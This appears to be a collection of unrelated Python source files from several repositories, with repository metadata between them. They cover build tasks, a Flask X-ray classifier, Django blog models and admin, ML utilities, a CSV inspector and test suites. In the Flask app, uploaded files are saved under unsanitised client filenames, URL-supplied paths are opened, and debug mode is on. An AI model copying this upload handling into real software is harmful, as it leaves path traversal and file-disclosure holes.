if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ShowApiVersionResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 26.284404
| 74
| 0.55288
|
406e8473f7886aab1e70576ceb1a85774f9aa63b
| 3,290
|
py
|
Python
|
tasks.py
|
romnn/lsde2021
|
6730b50434c320e60b2d7e14e3dfdce25be87323
|
[
"MIT"
] | null | null | null |
tasks.py
|
romnn/lsde2021
|
6730b50434c320e60b2d7e14e3dfdce25be87323
|
[
"MIT"
] | null | null | null |
tasks.py
|
romnn/lsde2021
|
6730b50434c320e60b2d7e14e3dfdce25be87323
|
[
"MIT"
] | null | null | null |
"""
Tasks for maintaining the project.
Execute 'invoke --list' for guidance on using Invoke
"""
import shutil
import pprint
from invoke import task
import webbrowser
from pathlib import Path
Path().expanduser()
ROOT_DIR = Path(__file__).parent
SETUP_FILE = ROOT_DIR.joinpath("setup.py")
TEST_DIR = ROOT_DIR.joinpath("tests")
SOURCE_DIR = ROOT_DIR.joinpath("lsde2021")
TOX_DIR = ROOT_DIR.joinpath(".tox")
COVERAGE_FILE = ROOT_DIR.joinpath(".coverage")
COVERAGE_DIR = ROOT_DIR.joinpath("htmlcov")
COVERAGE_REPORT = COVERAGE_DIR.joinpath("index.html")
PYTHON_DIRS = [str(d) for d in [SOURCE_DIR, TEST_DIR]]
def _delete_file(file):
try:
file.unlink(missing_ok=True)
except TypeError:
# missing_ok argument added in 3.8
try:
file.unlink()
except FileNotFoundError:
pass
@task(help={"check": "Checks if source is formatted without applying changes"})
def format(c, check=False):
"""Format code"""
python_dirs_string = " ".join(PYTHON_DIRS)
black_options = "--diff" if check else ""
c.run("pipenv run black {} {}".format(black_options, python_dirs_string))
isort_options = "{}".format("--check-only" if check else "")
c.run("pipenv run isort {} {}".format(isort_options, python_dirs_string))
@task
def lint(c):
"""Lint code"""
c.run("pipenv run flake8 {}".format(SOURCE_DIR))
@task
def test(c, min_coverage=None, parallel=True, verbose=True):
"""Run tests"""
cov_options = "--cov-fail-under={}".format(min_coverage) if min_coverage else ""
parallel_options = "-n auto" if parallel else ""
verbose_options = "-vv" if verbose else ""
c.run(
"pipenv run pytest --cov={} {} {} {}".format(
SOURCE_DIR, parallel_options, verbose_options, cov_options
)
)
@task
def type_check(c):
"""Check types"""
c.run("pipenv run mypy")
@task
def install_hooks(c):
"""Install pre-commit hooks"""
c.run("pipenv run pre-commit install -t pre-commit")
c.run("pipenv run pre-commit install -t pre-push")
@task
def pre_commit(c):
"""Run all pre-commit checks"""
c.run("pipenv run pre-commit run --all-files")
@task
def clean_build(c):
"""Clean up files from package building"""
c.run("rm -fr build/")
c.run("rm -fr dist/")
c.run("rm -fr .eggs/")
c.run("find . -name '*.egg-info' -exec rm -fr {} +")
c.run("find . -name '*.egg' -exec rm -f {} +")
@task
def clean_python(c):
"""Clean up python file artifacts"""
c.run("find . -name '*.pyc' -exec rm -f {} +")
c.run("find . -name '*.pyo' -exec rm -f {} +")
c.run("find . -name '*~' -exec rm -f {} +")
c.run("find . -name '__pycache__' -exec rm -fr {} +")
@task
def clean_tests(c):
"""Clean up files from testing"""
_delete_file(COVERAGE_FILE)
shutil.rmtree(TOX_DIR, ignore_errors=True)
shutil.rmtree(COVERAGE_DIR, ignore_errors=True)
@task(pre=[clean_build, clean_python, clean_tests])
def clean(c):
"""Runs all clean sub-tasks"""
pass
@task(clean)
def dist(c):
"""Build source and wheel packages"""
c.run("python setup.py sdist")
c.run("python setup.py bdist_wheel")
@task()
def requirements(c):
"""Lock and write out the requirements"""
c.run("pipenv lock -r > requirements.txt")
| 25.503876
| 84
| 0.643465
|
78269c5eb93e6a5af65d2d40098c3aa88911827e
| 2,025
|
py
|
Python
|
app.py
|
sambezalel/flask-covid-19
|
44c6b03874591a32de5f5c2168dcdea227283657
|
[
"Apache-2.0"
] | null | null | null |
app.py
|
sambezalel/flask-covid-19
|
44c6b03874591a32de5f5c2168dcdea227283657
|
[
"Apache-2.0"
] | null | null | null |
app.py
|
sambezalel/flask-covid-19
|
44c6b03874591a32de5f5c2168dcdea227283657
|
[
"Apache-2.0"
] | null | null | null |
from tensorflow.keras.models import load_model
from tensorflow.keras.preprocessing import image
import numpy as np
from flask import Flask, redirect, templating, url_for, request, render_template
import os
from werkzeug.utils import HTMLBuilder
#from werkzeug import secure_filename
app = Flask(__name__)
@app.route('/report/<name>')
def report(name):
# dimensions of our images
img_width, img_height = 224, 224
# load the model we saved
model = load_model('keras.h5')
model.compile(loss='binary_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
# predicting images
#img = image.load_img(name).convert('L')
#img = img.resize(img_height, img_width)
img = image.load_img(name, target_size=(img_width, img_height))
x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
images = np.vstack([x])
classes = model.predict_classes(images, batch_size=10)
if classes[0][0] == 1:
return render_template("negative.html")
else:
return render_template("positive.html")
@app.route('/login', methods=['POST', 'GET'])
def login():
if request.method == 'POST':
file = request.files['nm']
basepath = os.path.dirname(__file__)
#file.save(os.path.join(basepath, "uploads", file.filename))
#user = os.path.join(basepath, "uploads", file.filename)
file.save(os.path.join(basepath, file.filename))
user = file.filename
return redirect(url_for('report', name=user))
else:
user = request.args.get('nm')
return redirect(url_for('report', name=user))
@app.route("/")
def home_view():
return render_template("index.html")
@app.route("/app")
def app_view():
return render_template("app.html")
@app.route("/negative")
def negative_view():
return render_template("negative.html")
@app.route("/positive")
def positive_view():
return render_template("positive.html")
if __name__ == '__main__':
app.run(debug=True)
| 27.364865
| 80
| 0.665185
|
956265c326e4fffc78aa1e6d5bc1aef4dbff1214
| 5,924
|
py
|
Python
|
privatekube/privatekube/experiments/utils.py
|
DelphianCalamity/PrivateKube
|
14f575e77021ab7baca30f4061140ec83bdc96a7
|
[
"Apache-2.0"
] | 9
|
2021-06-16T00:22:45.000Z
|
2021-11-25T07:19:11.000Z
|
privatekube/privatekube/experiments/utils.py
|
DelphianCalamity/PrivateKube
|
14f575e77021ab7baca30f4061140ec83bdc96a7
|
[
"Apache-2.0"
] | 2
|
2021-11-14T10:42:43.000Z
|
2022-03-16T03:43:22.000Z
|
privatekube/privatekube/experiments/utils.py
|
DelphianCalamity/PrivateKube
|
14f575e77021ab7baca30f4061140ec83bdc96a7
|
[
"Apache-2.0"
] | 3
|
2021-04-08T08:08:48.000Z
|
2021-12-24T01:42:20.000Z
|
from absl import flags, logging
import yaml
import json
import os
import pandas as pd
import time
import torch
import numpy as np
import gcsfs
FLAGS = flags.FLAGS
GCP_PROJECT = "project-id-1234"
def build_flags(*arg_dicts):
"""
Declares Absl flags from a dictionary.
Flags are associated with this privatekube module, but shared with everyone.
"""
for arg_dict in arg_dicts:
for arg_name, default_value in arg_dict.items():
if type(default_value) == bool:
flags.DEFINE_bool(arg_name, default_value, arg_name)
if type(default_value) == int:
flags.DEFINE_integer(arg_name, default_value, arg_name)
if type(default_value) == float:
flags.DEFINE_float(arg_name, default_value, arg_name)
if type(default_value) == str:
flags.DEFINE_string(arg_name, default_value, arg_name)
def flags_to_dict(*arg_dicts):
"""
Returns a dict with the value of the flags we care about.
"""
result = {}
for arg_dict in arg_dicts:
for arg_name in arg_dict.keys():
result[arg_name] = getattr(FLAGS, arg_name)
return result
def results_to_dict(
train_size=None,
test_size=None,
dataset_files=None,
training_time=None,
epsilon=None,
delta=None,
mse=None,
rmse=None,
rmsle=None,
accuracy=None,
loss=None,
):
dict_results = {
"train_size": train_size,
"test_size": test_size,
"dataset_files": dataset_files,
"training_time": training_time,
"epsilon": epsilon,
"delta": delta,
"mse": mse,
"rmse": rmse,
"rmsle": rmsle,
"accuracy": accuracy,
}
return dict_results
def save_model(model_path, model):
model_dir = os.path.dirname(model_path)
if not os.path.exists(model_dir) and model_dir != "":
os.makedirs(model_dir)
logging.debug(f"Created directory: {model_dir}.")
torch.save(model.state_dict(), model_path)
def save_yaml(yaml_path, dict_results):
yaml_dir = os.path.dirname(yaml_path)
if not os.path.exists(yaml_dir) and yaml_dir != "":
os.makedirs(yaml_dir)
logging.debug(f"Created directory: {yaml_dir}.")
with open(yaml_path, "w") as f:
yaml.dump(dict_results, f)
logging.debug(f"Wrote yaml: {yaml_path}")
def raw_flags_to_dict(flags):
d = {}
for attr, flag_obj in flags.__flags.items():
d[attr] = flag_obj.value
return d
def load_yaml(yaml_path):
with open(yaml_path, "r") as f:
configs = yaml.safe_load(f)
return configs
def dicts_to_df(dict_list):
"""Concatenates a list of dictionaries with similar keys into a dataframe"""
all_keys = set()
for r in dict_list:
all_keys.update(r.keys())
data = {}
for key in all_keys:
data[key] = []
for d in dict_list:
for key in all_keys:
if key in d:
data[key].append(d[key])
else:
data[key].append(None)
df = pd.DataFrame(data=data)
return df
def save_results_to_yaml(
log_dir,
train_size,
test_size,
dataset_files,
training_time=None,
epsilon=None,
delta=None,
mse=None,
rmse=None,
rmsle=None,
accuracy=None,
loss=None,
):
dict_results = {
"train_size": train_size,
"test_size": test_size,
"dataset_files": dataset_files,
"training_time": training_time,
"epsilon": epsilon,
"delta": delta,
"mse": mse,
"rmse": rmse,
"rmsle": rmsle,
"accuracy": accuracy,
"timestamp": time.time(),
}
yaml_path = os.path.join(log_dir, "results.yaml")
with open(yaml_path, "w") as f:
yaml.dump(dict_results, f)
print(f"Saved logs to {yaml_path}.")
def yaml_dir_to_df(dir):
all_experiments = None
print(f"Loading {dir}")
if dir[0:5] == "gs://":
fs = gcsfs.GCSFileSystem(project=GCP_PROJECT)
files = list(map(lambda blob: blob["name"], fs.listdir(dir)))
else:
files = os.listdir(dir)
for index, yaml_file in enumerate(filter(lambda f: f.endswith(".yaml"), files)):
if dir[0:5] == "gs://":
with fs.open(yaml_file) as f:
config = yaml.load(f, Loader=yaml.Loader)
else:
with open(os.path.join(dir, yaml_file)) as f:
config = yaml.load(f, Loader=yaml.Loader)
# Pop nested lists that don't fit in the DF
to_pop = []
for key, value in config.items():
if isinstance(value, list):
to_pop.append(key)
for key in to_pop:
config.pop(key, None)
# Transform to dataframe
experiment = pd.DataFrame(config, index=[index])
# workload = pd.DataFrame(config["workload"], index=[index])
# results = pd.DataFrame(config["results"], index=[index])
# experiment = dp.join(workload).join(results)
# Update
if all_experiments is None:
all_experiments = experiment
else:
all_experiments = all_experiments.append(experiment)
return all_experiments
def yaml_dir_to_csv(dir, path):
df = yaml_dir_to_df(dir)
df.to_csv(path)
return
def multiclass_accuracy(outputs, labels):
_, predicted = torch.max(outputs.data, 1)
total = labels.size(0)
correct = (predicted == labels).sum().float()
return correct / total
def binary_accuracy(preds, y):
rounded_preds = torch.round(torch.sigmoid(preds))
correct = (rounded_preds == y).float()
acc = correct.sum() / len(correct)
return acc
def epoch_time(start_time, end_time):
elapsed_time = end_time - start_time
elapsed_mins = int(elapsed_time / 60)
elapsed_secs = int(elapsed_time - (elapsed_mins * 60))
return elapsed_mins, elapsed_secs
| 26.212389
| 84
| 0.613606
|
44016c7d6de76195a2afd8a37d9fd6f464a79e09
| 2,536
|
py
|
Python
|
blog/migrations/0001_initial.py
|
deejay001/Deejay-Tech-site
|
c454c45eadc0662bef2e806984ab7fa85aeae4e7
|
[
"Apache-2.0"
] | null | null | null |
blog/migrations/0001_initial.py
|
deejay001/Deejay-Tech-site
|
c454c45eadc0662bef2e806984ab7fa85aeae4e7
|
[
"Apache-2.0"
] | null | null | null |
blog/migrations/0001_initial.py
|
deejay001/Deejay-Tech-site
|
c454c45eadc0662bef2e806984ab7fa85aeae4e7
|
[
"Apache-2.0"
] | null | null | null |
# Generated by Django 3.0.8 on 2020-08-19 14:40
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=30, unique=True)),
('created_on', models.DateTimeField(auto_now_add=True)),
('updated_on', models.DateTimeField(auto_now=True)),
],
options={
'ordering': ['-created_on'],
},
),
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=30, unique=True)),
('slug', models.SlugField(max_length=30, unique=True)),
('content', models.TextField()),
('image', models.ImageField(upload_to='media')),
('updated_on', models.DateTimeField(auto_now=True)),
('created_on', models.DateTimeField(auto_now_add=True)),
('status', models.IntegerField(choices=[(0, 'Draft'), (1, 'Publish')])),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='blog_posts', to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ['-created_on'],
},
),
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=30)),
('email', models.EmailField(max_length=254)),
('body', models.TextField()),
('created_on', models.DateTimeField(auto_now_add=True)),
('active', models.BooleanField(default=False)),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='comments', to='blog.Post')),
],
options={
'ordering': ['-created_on'],
},
),
]
| 40.903226
| 147
| 0.558754
|
8ede36227847590fe8c301158dac36ee1c5368a8
| 2,726
|
py
|
Python
|
DjangoBlog/admin_site.py
|
lixiaofeng1993/DjangoBlog
|
94d062324367b8a30edf8d29e2e661c822bcb7c1
|
[
"MIT"
] | null | null | null |
DjangoBlog/admin_site.py
|
lixiaofeng1993/DjangoBlog
|
94d062324367b8a30edf8d29e2e661c822bcb7c1
|
[
"MIT"
] | 6
|
2020-06-06T00:44:08.000Z
|
2022-01-13T01:52:46.000Z
|
DjangoBlog/admin_site.py
|
lixiaofeng1993/DjangoBlog
|
94d062324367b8a30edf8d29e2e661c822bcb7c1
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# encoding: utf-8
"""
@version: ??
@author: liangliangyy
@license: MIT Licence
@contact: liangliangyy@gmail.com
@site: https://www.lylinux.net/
@software: PyCharm
@file: admin_site.py
@time: 2018/1/7 上午2:21
"""
from django.contrib.admin import AdminSite
from DjangoBlog.utils import get_current_site
from django.contrib.sites.admin import SiteAdmin
from django.contrib.admin.models import LogEntry
from django.contrib.sites.models import Site
from DjangoBlog.logentryadmin import LogEntryAdmin
# from djcelery.models import PeriodicTask, CrontabSchedule, IntervalSchedule, PeriodicTasks, WorkerState
from blog.admin import *
from accounts.admin import *
from oauth.admin import *
from servermanager.admin import *
from comments.admin import *
from owntracks.admin import *
from base.admin import *
from guest.admin import *
class DjangoBlogAdminSite(AdminSite):
site_header = '博客管理后台'
site_title = '博客管理后台管理员'
def __init__(self, name='admin'):
super().__init__(name)
def has_permission(self, request):
return request.user.is_superuser
# def get_urls(self):
# urls = super().get_urls()
# from django.urls import path
# from blog.views import refresh_memcache
#
# my_urls = [
# path('refresh/', self.admin_view(refresh_memcache), name="refresh"),
# ]
# return urls + my_urls
admin_site = DjangoBlogAdminSite(name='admin')
admin_site.register(Article, ArticlelAdmin)
admin_site.register(Category, CategoryAdmin)
admin_site.register(Tag, TagAdmin)
admin_site.register(Links, LinksAdmin)
admin_site.register(SideBar, SideBarAdmin)
admin_site.register(BlogSettings, BlogSettingsAdmin)
admin_site.register(commands, CommandsAdmin)
admin_site.register(EmailSendLog, EmailSendLogAdmin)
admin_site.register(BlogUser, BlogUserAdmin)
admin_site.register(Comment, CommentAdmin)
admin_site.register(OAuthUser, OAuthUserAdmin)
admin_site.register(OAuthConfig, OAuthConfigAdmin)
admin_site.register(OwnTrackLog, OwnTrackLogsAdmin)
admin_site.register(Site, SiteAdmin)
admin_site.register(LogEntry, LogEntryAdmin)
admin_site.register(Project, ProjectAdmin)
admin_site.register(Environment, EnvAdmin)
admin_site.register(Interface, InterfaceAdmin)
admin_site.register(Case, CaseAdmin)
admin_site.register(Plan, PlanAdmin)
admin_site.register(Report, ReportAdmin)
admin_site.register(Sign, SignAdmin)
admin_site.register(Event, EventAdmin)
admin_site.register(Guest, GuestAdmin)
# admin_site.register(PeriodicTask)
# admin_site.register(CrontabSchedule)
# admin_site.register(IntervalSchedule)
# admin_site.register(PeriodicTasks)
# admin_site.register(WorkerState)
| 29
| 105
| 0.771093
|
0471659deb1002875ec4f0faf524cab1b2e40136
| 370
|
py
|
Python
|
ir_axioms/model/__init__.py
|
webis-de/ir_axioms
|
9c1b3ed4e47c6c4f3405ebd49fff0ceeb431a753
|
[
"MIT"
] | 11
|
2022-02-20T12:10:12.000Z
|
2022-03-11T15:45:19.000Z
|
ir_axioms/model/__init__.py
|
heinrichreimer/ir_axioms
|
f7349c4adde96cfa19c7247824a70a4662c07582
|
[
"MIT"
] | 3
|
2022-02-28T15:47:29.000Z
|
2022-03-02T09:14:59.000Z
|
ir_axioms/model/__init__.py
|
heinrichreimer/ir_axioms
|
f7349c4adde96cfa19c7247824a70a4662c07582
|
[
"MIT"
] | 1
|
2022-02-20T15:42:42.000Z
|
2022-02-20T15:42:42.000Z
|
from ir_axioms.model import base, context
# Re-export sub-modules.
Query = base.Query
Document = base.Document
TextDocument = base.TextDocument
RankedDocument = base.RankedDocument
RankedTextDocument = base.RankedTextDocument
JudgedRankedDocument = base.JudgedRankedDocument
JudgedRankedTextDocument = base.JudgedRankedTextDocument
IndexContext = context.IndexContext
| 28.461538
| 56
| 0.848649
|
1e9df13b3894d87ccfb800e350360daf8d5903eb
| 6,129
|
py
|
Python
|
csvchk.py
|
kyclark/csvchk
|
fee2b14adf6e94b05e8e00f9b1eeb44d19e5fb71
|
[
"MIT"
] | null | null | null |
csvchk.py
|
kyclark/csvchk
|
fee2b14adf6e94b05e8e00f9b1eeb44d19e5fb71
|
[
"MIT"
] | null | null | null |
csvchk.py
|
kyclark/csvchk
|
fee2b14adf6e94b05e8e00f9b1eeb44d19e5fb71
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
"""
Purpose: Check the first/few records of a delimited text file
Author : Ken Youens-Clark <kyclark@gmail.com>
"""
import argparse
import csv
import os
import pyparsing as pp
import re
import sys
from typing import List, TextIO, NamedTuple, Any, Dict
VERSION = '0.1.8'
class Args(NamedTuple):
file: List[TextIO]
sep: str
fieldnames: str
limit: int
grep: str
dense_view: bool
show_field_number: bool
no_headers: bool
# --------------------------------------------------
def get_args() -> Args:
"""Get command-line arguments"""
parser = argparse.ArgumentParser(
description='Check a delimited text file',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('file',
metavar='FILE',
type=str,
nargs='+',
help='Input file(s)')
parser.add_argument('-s',
'--sep',
help='Field separator',
metavar='sep',
type=str,
default='')
parser.add_argument('-f',
'--fieldnames',
help='Field names (no header)',
metavar='names',
type=str,
default='')
parser.add_argument('-l',
'--limit',
help='How many records to show',
metavar='nrecs',
type=int,
default=1)
parser.add_argument('-g',
'--grep',
help='Only show records with a given value',
metavar='grep',
type=str,
default='')
parser.add_argument('-d',
'--dense',
help='Not sparse (skip empty fields)',
action='store_true')
parser.add_argument('-n',
'--number',
help='Show field number (e.g., for awk)',
action='store_true')
parser.add_argument('-N',
'--noheaders',
help='No headers in first row',
action='store_true')
parser.add_argument('-e',
'--encoding',
help='File encoding',
metavar='encode',
type=str,
choices=['utf-8', 'utf-8-sig', 'ISO-8859-1'],
default='utf-8')
parser.add_argument('--version',
action='version',
version=f'%(prog)s {VERSION}')
args = parser.parse_args()
for filename in args.file:
if filename != '-' and not os.path.isfile(filename):
parser.error(f"No such file or directory: '{filename}'")
open_args = {'encoding': args.encoding, 'errors': 'ignore'}
args.file = list(
map(lambda f: sys.stdin
if f == '-' else open(f, **open_args), args.file))
if len(args.sep) > 1:
parser.error(f'--sep "{args.sep}" must be a 1-character string')
return Args(file=args.file,
sep=args.sep,
fieldnames=args.fieldnames,
limit=args.limit,
grep=args.grep,
dense_view=args.dense,
show_field_number=args.number,
no_headers=args.noheaders)
# --------------------------------------------------
def main() -> None:
""" Make a jazz noise here """
args = get_args()
grep = args.grep
for i, fh in enumerate(args.file):
if len(args.file) > 1:
print('{}==> {} <=='.format('\n' if i > 0 else '',
os.path.basename(fh.name)))
sep = guess_sep(args.sep, fh.name)
csv_args: Dict[str, Any] = {'delimiter': sep}
if args.fieldnames:
names = re.split(r'\s*,\s*', args.fieldnames)
if names:
csv_args['fieldnames'] = names
if args.no_headers:
line = fh.readline()
num_flds = len(pp.commaSeparatedList.parseString(line).asList())
csv_args['fieldnames'] = list(
map(lambda i: f'Field{i}', range(1, num_flds + 1)))
if fh.name != '<stdin>':
fh.seek(0)
reader = csv.DictReader(fh, **csv_args)
num_shown = 0
for row in reader:
vals = dict([x for x in row.items()
if x[1] != '']) if args.dense_view else row
if grep and not any([grep in x for x in vals.values()]):
continue
flds = vals.keys()
longest = max(map(len, flds))
fmt = '{:' + str(longest + 1) + '}: {}'
num_shown += 1
print(f'// ****** Record {num_shown} ****** //')
for n, (key, val) in enumerate(vals.items(), start=1):
show = fmt.format(key, val)
if args.show_field_number:
print('{:3} {}'.format(n, show))
else:
print(show)
if num_shown == args.limit:
break
# --------------------------------------------------
def guess_sep(sep: str, filename: str) -> str:
""" If no separator, guess from file extension """
if not sep:
_, ext = os.path.splitext(filename)
if ext == '.csv':
sep = ','
else:
sep = '\t'
return sep
# --------------------------------------------------
def test_guess_sep() -> None:
""" Test guess_sep() """
assert guess_sep(',', 'foo.csv') == ','
assert guess_sep('', 'foo.csv') == ','
assert guess_sep('\t', 'foo.csv') == '\t'
assert guess_sep('', 'foo.tab') == '\t'
assert guess_sep('', 'foo.txt') == '\t'
# --------------------------------------------------
if __name__ == '__main__':
main()
| 30.044118
| 76
| 0.441344
|
95bbc26cc394befb98b7d7edad885cc2907b0856
| 1,456
|
py
|
Python
|
{{cookiecutter.project_slug}}/backend/app/app/rest_tests/api/api_v1/token/test_token.py
|
senseta-os/base-project
|
2cc977b828ac2204cb9fd014abd7c6ff0ff148d6
|
[
"MIT"
] | 54
|
2017-12-01T17:28:43.000Z
|
2022-03-08T11:12:54.000Z
|
{{cookiecutter.project_slug}}/backend/app/app/rest_tests/api/api_v1/token/test_token.py
|
senseta-os/base-project
|
2cc977b828ac2204cb9fd014abd7c6ff0ff148d6
|
[
"MIT"
] | null | null | null |
{{cookiecutter.project_slug}}/backend/app/app/rest_tests/api/api_v1/token/test_token.py
|
senseta-os/base-project
|
2cc977b828ac2204cb9fd014abd7c6ff0ff148d6
|
[
"MIT"
] | 9
|
2017-12-07T13:50:37.000Z
|
2021-07-11T02:49:47.000Z
|
# Import installed packages
import requests
# Import app code
from app.core import config
def test_get_access_token(server_api):
login_data = {
'username': config.FIRST_SUPERUSER,
'password': config.FIRST_SUPERUSER_PASSWORD
}
r = requests.post(
f'{server_api}{config.API_V1_STR}/login/access-token', data=login_data)
tokens = r.json()
assert r.status_code == 200
assert 'access_token' in tokens
assert 'refresh_token' in tokens
assert tokens['access_token']
assert tokens['refresh_token']
def test_use_access_token(server_api, superuser_token_headers):
r = requests.post(
f'{server_api}{config.API_V1_STR}/login/test-token',
headers=superuser_token_headers,
json={'test': 'test'})
result = r.json()
assert r.status_code == 200
assert 'id' in result
def test_refresh_token(server_api):
login_data = {
'username': config.FIRST_SUPERUSER,
'password': config.FIRST_SUPERUSER_PASSWORD
}
r = requests.post(
f'{server_api}{config.API_V1_STR}/login/access-token', data=login_data)
tokens = r.json()
refresh_token = tokens['refresh_token']
headers = {
'Authorization': f'Bearer {refresh_token}'
}
r = requests.post(
f'{server_api}{config.API_V1_STR}/login/refresh-token',
headers=headers)
result = r.json()
assert r.status_code == 200
assert 'access_token' in result
| 29.12
| 79
| 0.67239
|
39927ce8584ea654a72016b6c59ba8738a38b2fa
| 16,851
|
py
|
Python
|
tests/integration/test_stream_transform.py
|
STARInformatics/kgx
|
a4b4dd73f866486466c03579f62e0c527ef1af1e
|
[
"BSD-3-Clause"
] | null | null | null |
tests/integration/test_stream_transform.py
|
STARInformatics/kgx
|
a4b4dd73f866486466c03579f62e0c527ef1af1e
|
[
"BSD-3-Clause"
] | null | null | null |
tests/integration/test_stream_transform.py
|
STARInformatics/kgx
|
a4b4dd73f866486466c03579f62e0c527ef1af1e
|
[
"BSD-3-Clause"
] | null | null | null |
import copy
import os
import pytest
from kgx.transformer import Transformer
from tests import TARGET_DIR, RESOURCE_DIR, print_graph
from tests.integration import (
clean_slate,
DEFAULT_NEO4J_URL,
DEFAULT_NEO4J_USERNAME,
DEFAULT_NEO4J_PASSWORD,
)
def run_transform(query):
_transform(copy.deepcopy(query))
_stream_transform(copy.deepcopy(query))
def _transform(query):
"""
Transform an input to an output via Transformer.
"""
t1 = Transformer()
t1.transform(query[0])
t1.save(query[1].copy())
assert t1.store.graph.number_of_nodes() == query[2]
assert t1.store.graph.number_of_edges() == query[3]
output = query[1]
if output['format'] in {'tsv', 'csv', 'jsonl'}:
input_args = {
'filename': [
f"{output['filename']}_nodes.{output['format']}",
f"{output['filename']}_edges.{output['format']}",
],
'format': output['format'],
}
elif output['format'] in {'neo4j'}:
input_args = {
'uri': DEFAULT_NEO4J_URL,
'username': DEFAULT_NEO4J_USERNAME,
'password': DEFAULT_NEO4J_PASSWORD,
'format': 'neo4j',
}
else:
input_args = {'filename': [f"{output['filename']}"], 'format': output['format']}
t2 = Transformer()
t2.transform(input_args)
assert t2.store.graph.number_of_nodes() == query[2]
assert t2.store.graph.number_of_edges() == query[3]
def _stream_transform(query):
"""
Transform an input to an output via Transformer where streaming is enabled.
"""
t1 = Transformer(stream=True)
t1.transform(query[0], query[1])
output = query[1]
if output['format'] in {'tsv', 'csv', 'jsonl'}:
input_args = {
'filename': [
f"{output['filename']}_nodes.{output['format']}",
f"{output['filename']}_edges.{output['format']}",
],
'format': output['format'],
}
elif output['format'] in {'neo4j'}:
input_args = {
'uri': DEFAULT_NEO4J_URL,
'username': DEFAULT_NEO4J_USERNAME,
'password': DEFAULT_NEO4J_PASSWORD,
'format': 'neo4j',
}
else:
input_args = {'filename': [f"{output['filename']}"], 'format': output['format']}
t2 = Transformer()
t2.transform(input_args)
assert t2.store.graph.number_of_nodes() == query[2]
assert t2.store.graph.number_of_edges() == query[3]
@pytest.mark.parametrize(
'query',
[
(
{
'filename': [
os.path.join(RESOURCE_DIR, 'graph_nodes.tsv'),
os.path.join(RESOURCE_DIR, 'graph_edges.tsv'),
],
'format': 'tsv',
},
{'filename': os.path.join(TARGET_DIR, 'graph1.json'), 'format': 'json'},
512,
532,
),
(
{
'filename': [
os.path.join(RESOURCE_DIR, 'graph_nodes.tsv'),
os.path.join(RESOURCE_DIR, 'graph_edges.tsv'),
],
'format': 'tsv',
},
{'filename': os.path.join(TARGET_DIR, 'graph2'), 'format': 'jsonl'},
512,
532,
),
(
{
'filename': [
os.path.join(RESOURCE_DIR, 'graph_nodes.tsv'),
os.path.join(RESOURCE_DIR, 'graph_edges.tsv'),
],
'format': 'tsv',
'lineterminator': None,
},
{'filename': os.path.join(TARGET_DIR, 'graph3.nt'), 'format': 'nt'},
512,
532,
),
(
{
'filename': [
os.path.join(RESOURCE_DIR, 'graph_nodes.tsv'),
os.path.join(RESOURCE_DIR, 'graph_edges.tsv'),
],
'format': 'tsv',
'node_filters': {'category': {'biolink:Gene'}},
},
{'filename': os.path.join(TARGET_DIR, 'graph4'), 'format': 'jsonl'},
178,
178,
),
(
{
'filename': [
os.path.join(RESOURCE_DIR, 'graph_nodes.tsv'),
os.path.join(RESOURCE_DIR, 'graph_edges.tsv'),
],
'format': 'tsv',
'node_filters': {'category': {'biolink:Gene'}},
'edge_filters': {'predicate': {'biolink:interacts_with'}},
},
{'filename': os.path.join(TARGET_DIR, 'graph5'), 'format': 'jsonl'},
178,
165,
),
(
{
'filename': [
os.path.join(RESOURCE_DIR, 'graph_nodes.tsv'),
os.path.join(RESOURCE_DIR, 'graph_edges.tsv'),
],
'format': 'tsv',
'edge_filters': {
'subject_category': {'biolink:Disease'},
'object_category': {'biolink:PhenotypicFeature'},
'predicate': {'biolink:has_phenotype'},
},
},
{'filename': os.path.join(TARGET_DIR, 'graph6'), 'format': 'jsonl'},
133,
13,
),
],
)
def test_transform1(query):
"""
Test loading data from a TSV source and writing to various sinks.
"""
run_transform(query)
@pytest.mark.parametrize(
'query',
[
(
{'filename': [os.path.join(RESOURCE_DIR, 'graph.json')], 'format': 'json'},
{
'filename': os.path.join(TARGET_DIR, 'graph1s2'),
'format': 'tsv',
'node_properties': ['id', 'name', 'category', 'taxon'],
'edge_properties': ['subject', 'predicate', 'object', 'relation', 'provided_by'],
},
512,
532,
),
(
{'filename': [os.path.join(RESOURCE_DIR, 'graph.json')], 'format': 'json'},
{'filename': os.path.join(TARGET_DIR, 'graph2s2'), 'format': 'jsonl'},
512,
532,
),
(
{'filename': [os.path.join(RESOURCE_DIR, 'graph.json')], 'format': 'json'},
{'filename': os.path.join(TARGET_DIR, 'graph3s2.nt'), 'format': 'nt'},
512,
532,
),
(
{
'filename': [os.path.join(RESOURCE_DIR, 'graph.json')],
'format': 'json',
'edge_filters': {
'subject_category': {'biolink:Disease'},
'object_category': {'biolink:PhenotypicFeature'},
'predicate': {'biolink:has_phenotype'},
